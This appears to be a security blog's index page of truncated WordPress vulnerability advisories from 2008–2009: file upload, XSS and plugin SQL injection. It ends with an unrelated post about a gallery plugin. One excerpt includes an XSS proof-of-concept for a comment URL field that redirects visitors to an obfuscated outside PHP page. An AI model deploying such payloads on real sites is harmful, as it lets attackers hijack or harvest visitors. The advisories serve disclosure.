From: Dawid Golunski <golunski () onet eu>
Date: Wed, 11 Nov 2009 16:47:49 +0000
=============================================
- Release date: November 11th, 2009
- Discovered by: Dawid Golunski
- Severity: Moderately High
=============================================
I. VULNERABILITY
-------------------------
WordPress <= 2.8.5 Unrestricted File Upload Arbitrary PHP Code Execution
II. BACKGROUND
-------------------------
WordPress is a state-of-the-art publishing platform with a focus on
aesthetics, web standards,
and usability. WordPress is both free and priceless at the same time.
阅读全文
From:空虚浪子
by kxlzx inbreak.net
ps:感谢鬼仔’blog,XEYE’s blog协助测试。
实际上是个XSS漏洞。
POC:
XML/HTML代码
- 在评论的网址一栏,填写
- http://blog.sohu.com/fh8e3333211134333/f8e9wjfidsj3332dfs’ onmousemove=’location.href=String.fromCharCode(104,116,116,112,58,47,47,105,110,98,114,101,97,107,46,110,101,116,47,97,46,112,104,112);
这段代码仅供测试,是不能直接用的。
阅读全文
WordPress Plugin Related Sites 2.1 BlindSQLinj Vuln
http://wordpress.org/extend/plugins/related-sites/
/wp-content/plugins/related-sites/BTE_RW_webajax.php
eLwaux(c) 30.05.2009, uasc.org.ua
SQL-Inj
27: $guid = $_POST['guid'];
28: $click = $_POST['click'];
31: $ref = $_SERVER["HTTP_REFERER"];
阅读全文
From: milw0rm.com
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-004
- Original release date: December 3rd, 2008
- Last revised: March 10th, 2009
- Discovered by: Juan Galiana Lara
- Severity: 6.3/10 (CVSS scored)
=============================================
I. VULNERABILITY
-------------------------
WordPress MU < 2.7 'Host' HTTP Header Cross Site Scripting (XSS)
Vulnerability
阅读全文
买了相机了,总要找机会拍些片子,然后就去google相册的插件,发现NextGEN Gallery貌似还不错,就装了上来。功能很强大,提供了很完美的照片管理方法,操作也并不复杂。
现在WP插件网站上提供下载的最新版本
http://wordpress.org/extend/plugins/nextgen-gallery/
这是插件的官方网站:
http://alexrabe.boelinger.com/?page_id=80
阅读全文
